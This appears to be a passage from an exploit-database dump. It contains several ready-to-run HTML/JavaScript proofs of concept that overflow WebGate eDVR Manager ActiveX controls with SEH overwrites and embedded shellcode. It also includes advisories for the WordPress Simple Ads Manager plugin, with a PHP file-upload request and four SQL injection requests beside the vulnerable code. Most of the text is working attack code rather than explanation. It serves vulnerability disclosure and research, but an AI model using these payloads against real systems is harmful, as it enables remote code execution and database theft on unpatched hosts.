"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
{
buff2 += "A";
}
fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
target.ChangePassword(fbuff ,arg2);
</script>
</html>
<html>
<!--
# Exploit Title: WebGate eDVR Manager AudioOnlySiteChannel Property Stack Buffer Overflow
# Date: 01st April, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: eDVR Manager 2.6.4
# Tested on: Windows XP SP3 using IE6/7/8
# CVE : 2015-2098
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Property Let AudioOnlySiteChannel ( ByVal SiteSerialNumber As String , ByVal Channel As Integer ) As Long"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Tested on IE6/7/8
Author: Praveen Darshanam
http://darshanams.blogspot.com/
http://blog.disects.com/
P.S. Do not remove back slashes in shellcode and other variables
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var arg1 = "";
var arg2 = 1;
var arg3 = 1;
var nops = "";
var shellcode = "";
var buff2 = "";
for (i=0; i<128; i++)
{
arg1 += "B";
}
var nseh = "\xeb\x10PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
{
buff2 += "A";
}
fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
target.AudioOnlySiteChannel(fbuff ,arg2 ) = arg3
</script>
</html>
<html>
<!--
# Exploit Title: WebGate eDVR Manager SiteChannel Property Stack Buffer Overflow
# Date: 01st April, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: eDVR Manager 2.6.4
# Tested on: Windows XP SP3 using IE6/7/8
# CVE : 2015-2098
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Property Let SiteChannel (
ByVal SiteSerialNumber As String ,
ByVal indx As Integer
) As Long"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Tested on IE6/7/8
Author: Praveen Darshanam
http://darshanams.blogspot.com/
http://blog.disects.com/
P.S. Do not remove back slashes in shellcode and other variables
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var arg1 = "";
var arg2 = 1;
var arg3 = 1;
var nops = "";
var shellcode = "";
var buff2 = "";
for (i=0; i<128; i++)
{
arg1 += "B";
}
var nseh = "\xeb\x10PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
{
buff2 += "A";
}
fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
target.SiteChannel(fbuff ,arg2 ) = arg3;
</script>
</html>
<html>
<!--
# Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow
# Date: 01st April, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Tested on: Windows XP SP3 using IE8
# CVE : 2015-2097
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPSerialPort.dll"
prototype = "Sub Connect ( ByVal IPAddr As String , ByVal PortNum As Integer , ByVal UserID As String , ByVal Password As String )"
progid = "WESPSERIALPORTLib.WESPSerialPortCtrl"
Tested on IE8
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com/
P.S. Do not remove back slashes in shellcode and other variables
-->
<object classid='clsid:BAAA6516-267C-466D-93F5-C504EF973837' id='target'>
</object>
<script>
var arg1="PraveenD";
var arg2=1;
var arg3= "";
var arg4="PraveenD";
var nops = "";
var shellcode = "";
var buff2 = "";
for (i=0; i<1664; i++)
{
arg3 += "B";
}
var nseh = "\xeb\x10PD";
//WESPSerialPort.dll(0x100104e7 = pop pop ret)
var seh = "\xe7\x04\x01\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
{
buff2 += "A";
}
fbuff = arg3 + nseh + seh + nops + shellcode + buff2;
target.Connect(arg1, arg2, fbuff ,arg4);
</script>
</html>
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
Content-Length: 683
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="action"
upload_ad_image
-----------------------------108989518220095255551617421026—
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 303 to 314
case 'sam_ajax_upload_ad_image':
if(isset($_POST['path'])) {
$uploadDir = $_POST['path'];
$file = $uploadDir . basename($_FILES['uploadfile']['name']);
if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
$out = array('status' => "success");
} else {
$out = array('status' => "error");
}
}
break;
+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
action=load_combo_data
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
$page = $_GET['page'];
$rows = $_GET['rows'];
$searchTerm = $_GET['searchTerm'];
$offset = ((int)$page - 1) * (int)$rows;
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE '{$searchTerm}%'
ORDER BY wu.id
LIMIT $offset, $rows;";
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
'page' => $page,
'records' => count($users),
'rows' => $users,
'total' => $total,
'offset' => $offset
);
break;
---SQL INJECTION 4---
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
$roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
$roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
$roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
$roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
$roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN '$roleSubscriber'
WHEN 1 THEN '$roleContributor'
WHEN 2 THEN '$roleAuthor'
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',
IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
ORDER BY wu.id;";
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val['recid'] = $k;
}
$out = $users;
break;